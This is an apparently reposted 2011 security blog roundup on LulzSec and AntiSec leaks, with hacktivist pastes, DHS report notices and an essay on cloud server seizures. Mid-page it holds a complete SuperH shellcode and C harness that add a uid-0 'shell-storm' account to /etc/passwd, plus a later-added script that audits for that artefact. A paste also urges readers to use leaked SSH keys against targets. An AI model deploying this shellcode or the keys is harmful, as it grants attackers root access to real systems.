Friday, June 24, 2011

JadedSecurity #Lulzsec

jadedsecurity.net | Jun 23rd 2011

Much Ado about nothing but Information Security

Update: 2:09AM EST.

Got Tossed off of IRC Again…

At around 1am Lulzsecurity.com appears to have gone down again.

@MoooCowMoooCow had just notified me that @anonymoussabu has just gone away, and to boot the anonops IRC channel had a major disconnect (for me anyway).

Additionally, a new blog had been posted highlighting Operation SuperNova.

While the site states it is not going to post a mission statement at this time, it does go on to say:

“I’d like to let the public know that phase one of OPERATION SUPERNOVA has been successful. Lulzsecurity.com is Tango down at this time. The attack will stop by Midnight PST.”

Will keep you up to date.

I will be the first to admit that over the last couple of weeks the laughs have been coming almost non-stop from their antics. However, with today's leak “Chinga La Migra” it appears that they have gone too far. The leak consists of documents that could potentially put the lives of law enforcement officers and confidential informants at risk.

This is just one of the disclaimers that can be seen on the many documents that were released.

The release has information consisting of:

  • Operational Procedures
  • Employment records (Personal Contact information)
  • Informant Information
  • Assignment Rosters
  • Suspect information
  • Crime Scene Photos
  • Witness statements
  • Border patrol assignments
  • And the list goes on.

How many times can we take out Sony, PBS, Fox, etc.? For the most part it was funny and relatively harmless. While I never agreed with the release of civilian names, it was about exposing the insecure practices of organizations. As security professionals we know that once an attacker fixates on a target, it is only a matter of time. So yes, the group had accomplished the media frenzy that most of us had hoped for in order for businesses to wake up and start seriously looking at security.

The whole #AntiSec movement has gotten over the top. They are attacking targets and releasing sensitive data that in some instances can put people's lives at risk. I'm all about sticking it to the man as much as the next guy, but this has gone too far. Law enforcement officers are just doing their jobs, and do not deserve to be put in the line of fire, just because.

I don't agree with what the federal government is doing in executing blind sweeps looking for the #AntiSec players either, so it's not about taking sides. The FBI is using the Patriot Act as their get-out-of-jail-free card, but that's the administration, not the individuals who might be put in harm's way through these leaks.

With this latest leak, to me it seems that the days of #AntiSec might be numbered. @th3j35t3r is a key player in the daily DOXing of key members of the group. As others have pointed out, @th3j35t3r is actually beating law enforcement to the punch in every single attack. As they have gotten more and more exposure they have also gotten more brazen. After calling out Gawker earlier, they have now provided an interview. I think the end is near...

I want to thank @MoooCowMoooCow for pointing this out to me this morning. Apologies for not getting it out sooner.

Pastebin

/*
** Title: Linux/SuperH - sh4 - add root user with password - 143 bytes
** Date: 2011-06-23
** Tested on: debian-sh4 2.6.32-5-sh7751r
** Author: Jonathan Salwan - twitter: @shell_storm
**
** http://shell-storm.org
**
** Information:
** ------------
** - user: shell-storm
** - pswd: toor
** - uid : 0
**
** open:
**   mov #5, r3            ; __NR_open
**   mova @(130, pc), r0   ; r0 = address of the "@@@/etc/passwd" string
**   mov r0, r4
**   mov #255, r13
**   mov #4, r12
**   mul.l r13, r12        ; 255 * 4 = 1020
**   sts macl, r5
**   add #69, r5           ; 1020 + 69 = 1089 = O_WRONLY|O_CREAT|O_APPEND
**   mov #84, r13
**   mov #5, r12
**   mul.l r13, r12        ; 84 * 5 = 420 = 0644
**   sts macl, r6
**   trapa #2
**   mov r0, r11           ; r11 = returned fd
**
** write:
**   xor r6, r6
**   xor r5, r5
**   mov #4, r3            ; __NR_write
**   mov r11, r4
**   mova @(20, pc), r0    ; r0 = address of the passwd entry string
**   mov r0, r5
**   mov #72, r6           ; byte count
**   trapa #2
**
** close:
**   mov #6, r3            ; __NR_close
**   mov r11, r4
**   trapa #2
**
** exit:
**   mov #1, r3            ; __NR_exit
**   xor r4, r4
**   trapa #2
**
** user:
**   .string "shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n"
**
** file:
**   .string "@@@/etc/passwd"
**
**
** The '@@@' is just for alignment.
**
*/

#include <stdio.h>
#include <string.h>

char *SC =
/* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
"\x05\xe3\x20\xc7\x03\x64\xff\xed"
"\x04\xec\xd7\x0c\x1a\x05\x45\x75"
"\x54\xed\x05\xec\xd7\x0c\x1a\x06"
"\x02\xc3"

/* r11 = fd */
"\x03\x6b"

/* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
"\x6a\x26\x5a\x25\x04\xe3\xb3\x64"
"\x04\xc7\x03\x65\x48\xe6\x02\xc3"

/* close(fd) */
"\x06\xe3\xb3\x64\x02\xc3"

/* exit(0) */
"\x01\xe3\x4a\x24\x02\xc3"

/* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n
   (the final "\x5c\x6e" pair encodes a literal backslash and 'n', not a
   newline, so the 72-byte write above ends at the backslash) */
"\x73\x68\x65\x6c\x6c\x2d\x73\x74"
"\x6f\x72\x6d\x3a\x24\x31\x24\x4b"
"\x51\x59\x6c\x2f\x79\x72\x75\x24"
"\x50\x4d\x74\x30\x32\x7a\x55\x54"
"\x57\x6d\x4d\x76\x50\x57\x63\x55"
"\x34\x6f\x51\x4c\x73\x2f\x3a\x30"
"\x3a\x30\x3a\x72\x6f\x6f\x74\x3a"
"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62"
"\x69\x6e\x2f\x62\x61\x73\x68\x5c"
"\x6e"

/* @@@/etc/passwd */
"\x40\x40\x40\x2f\x65\x74\x63\x2f"
"\x70\x61\x73\x73\x77\x64";

int main(void)
{
    fprintf(stdout, "Length: %zu\n", strlen(SC));
    /* jump into the buffer; the page's test harness relies on it being executable */
    (*(void(*)()) SC)();
    return 0;
}
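A defender-side check to go with the listing: the shellcode appends a second uid-0/gid-0 account whose crypt hash sits directly in the password field of /etc/passwd. The script below is an added example, not part of the original post or of shell-storm's code; it audits passwd-format text for that pattern and related anomalies. The sample input is constructed, with the last line's hash copied from the listing above.

```python
# Added example (not from the original page): audit a passwd-format file for
# the artefact the SuperH shellcode above leaves behind, plus related anomalies.

SHADOW_MARKERS = {"x", "*", "!", "!!", ""}   # field-2 values that carry no hash

# Constructed sample. The last line mirrors the listing's appended entry; the
# hash is copied from the listing and is not claimed to match any real system.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash
"""


def audit_passwd(text):
    """Return [(line_no, reason), ...] for suspicious passwd-format entries."""
    findings = []
    seen = set()
    for no, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((no, "malformed entry (%d fields)" % len(fields)))
            continue
        name, pw, uid, gid = fields[:4]
        if name in seen:
            findings.append((no, "duplicate account name %r" % name))
        seen.add(name)
        if not (uid.isdigit() and gid.isdigit()):
            findings.append((no, "non-numeric uid/gid for %r" % name))
            continue
        if uid == "0" and name != "root":
            findings.append((no, "uid 0 account %r other than root" % name))
        if pw not in SHADOW_MARKERS:
            # pam_unix only consults /etc/shadow when this field is "x", so a
            # hash placed here is used directly and sidesteps shadow controls.
            findings.append((no, "password hash stored in passwd for %r" % name))
    return findings


def audit_file(path="/etc/passwd"):
    """Audit a real passwd file; returns the same finding list."""
    with open(path) as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for no, reason in audit_passwd(SAMPLE_PASSWD):
        print("line %d: %s" % (no, reason))
```

Run it against the sample and it flags only line 4, twice: once for the extra uid-0 account and once for the hash in field 2.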

One of the numerous lists I am on had provided a link to these interesting daily alerts. I'll be publishing them going forward.

Classification: UNCLASSIFIED
—————————————————————————————————–
(U) The DHS Daily Cyber Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Terrorism Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Human Trafficking and Smuggling Report for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Homeland Security Central Digest for 23 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

DHS Daily Open Source Infrastructure Report June 23, 2011 is attached.

As seen on their Twitter feed. I have confirmed the leak. Below is a sanitized screenshot of the leak.

UPDATE: @KrioXis had sent me a link to his WordPress.

@KrioXis has a different goal than what #AntiSec seems to be about. The persona seems to adhere to the reason why security guys love @LulZsec: to publicly display the false sense of security that governments and corporations have instilled in society. In conversations I have had with him, he has essentially the same ethics as most of us in the security business do. He will not leak confidential information. I for one hope that his methods will be employed by the rest of the groups. It stops being funny when individuals' personal information is exposed.

@KrioXis had forwarded me the PasteBin:

TWITTER.COM/KRIOXIS
#AntiSec
@LulzSec
@AnonOps

“One man's jailer is another man's freedom fighter.”
After seeing this posted on a website a few days back
some home truths kicked in, and made us wonder…

Why should we be stopped from posting this information?
The “secure” firms you give your information to should
be the ones who the police approach, not us.
Even more so after SOME of them “guarantee” your
information “isn't stored”, and if it is
then it is “secure”.
Should they not be approached regarding the DPA?
Who is the real law breaker here…?

As always, the freedom fighters of today are branded as
the bad ones, while money hungry business relish in their
deep deep pockets of money. Why not take out your wallet
and invest in the proper secure systems that you
promise us? we ask you.

So much for customer relations, so much for customer care
if companies really did what they said on the tin groups
like ourselves would never exist. But until the piggys
break the bank, there will be fighters, fighting for
the security we deserve. There is no denying that.

So it's down to who has the biggest balls or who
is willing to dig deep to protect their oh so valuable
customers. Gain respect for caring about others
and not just yourselves. Who knows, business might
pick up if you're showing willingness.

We will continue to contact companies in relation to
database vulnerabilities, but will only try for so long
before forcing their hand to dig deep, very deep.

We inspire to learn, we inspire to show,
We inspire to teach, we inspire to inspire.
Be inspired.

Over&Out
Twitter.com/KrioXis
#Antisec
[End of transmission]…

One of the numerous lists I am on had provided a link to these interesting daily alerts. I'll be publishing them going forward.

Classification: UNCLASSIFIED
—————————————————————————————————–
(U) The DHS Daily Cyber Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Terrorism Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Daily Human Trafficking and Smuggling Report for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

(U) The DHS Homeland Security Central Digest for 22 June 2011 is attached.
(U) Redistribution is encouraged. Please feel free to forward this email w/attachment to your co-workers and colleagues that might be interested in this product.

DHS Daily Open Source Infrastructure Report June 22, 2011 is attached.

As much as everybody hates the word, unfortunately we do have to live with it going forward. Those who don't know what the cloud is, aside from vendor fluff, can rest assured that the technology has been around forever. The buzzword is actually being used for an old technology that went by the name of grid computing. Grid computing was primarily used on mainframes; these days, however, we refer to cloud computing as virtual machines, which can have data and processing capability spanning multiple physical systems.

I'm not going to go into a discussion of what cloud computing is and what it isn't, but while doing some research I started thinking about the implications of today's events. According to the NY Times, the FBI had seized servers related to the attacks. Through that seizure they had also inadvertently seized systems that physically housed applications associated with InstaPaper. While InstaPaper was not involved in any of the attacks, apparently they shared computing resources. This raises an interesting question: if applications run on shared infrastructure, does law enforcement have the authority to seize them? Could they potentially be violating the rights of application owners who were not attacked, and of the customers who use services on these shared systems?

The Cloud Security Alliance is currently working on building what they refer to as the CloudSirt, which would come up with guidance for incident response. I have read several articles, including a paper put out by Harvard Law titled “Cloud Computing and National Security Law”, and it seems we are pretty much hosed at this moment. An interesting quote from the Harvard piece sums up my concern: “Cloud computing has made the very definition of what qualifies as ‘electronic storage’ murky under the Electronic Communications Protection Act (ECPA).”

Electronic storage has historically always been available to law enforcement for forensic purposes. How do you perform a forensic analysis against a storage medium that is constantly growing and shrinking based on use? Storage is now shared as well, by many entities, none of which have given up their rights to allow law enforcement to essentially seize their systems. Last but not least are the jurisdictional issues of where the storage sectors you or your business are using actually reside. This is not defined in any type of run book or operating procedure; the system decides where space is available and uses it at its discretion.

The current direction for investigations appears to be log analysis. The problem with that is that you, as a business, have essentially outsourced all of your physical architecture: the logs may or may not exist, depending on the verbiage set forth in the contracts with your providers. The “Cloud”, and god I hate that word, has brought forth many benefits, one of the greatest being ROI; however, with an increase in ROI the risk tolerance must adjust itself accordingly. It will more than likely come to a point where part of your threat modeling will have to include data leakage through law enforcement activity. Under the current regulations this will no doubt be seen as a breach, but I'm sure it will be adjusted in you-know-whose favor. It will be interesting to see how this plays out, if the attackers are brought to justice.

Found on IRC

See Video:

Update: This is not the Security Site.

Just caught this on PasteBin; looking through IRC and other sources to check validity.

Lovely Lulz Lizards,

In the aftermath of some of our recent attacks, some of our Anti-Sec Antagonists have suggested we’re out of ammunition. To this we extol a hearty Nay! Dear opponents, we’re just getting started! To prove our merciless lulz have naught but a continued stream of added boosts, we present to you the RSA-SSH1 and RSA-SSH2 private keys for some of our favorite targets!

Just cut and paste these into your cannons aimed at the machines below! Don’t forget your lulzy payloadz!

Original Page: http://www.jadedsecurity.com/

Elyssa Durant, Ed.M. 

Posted via email from Whistleblower
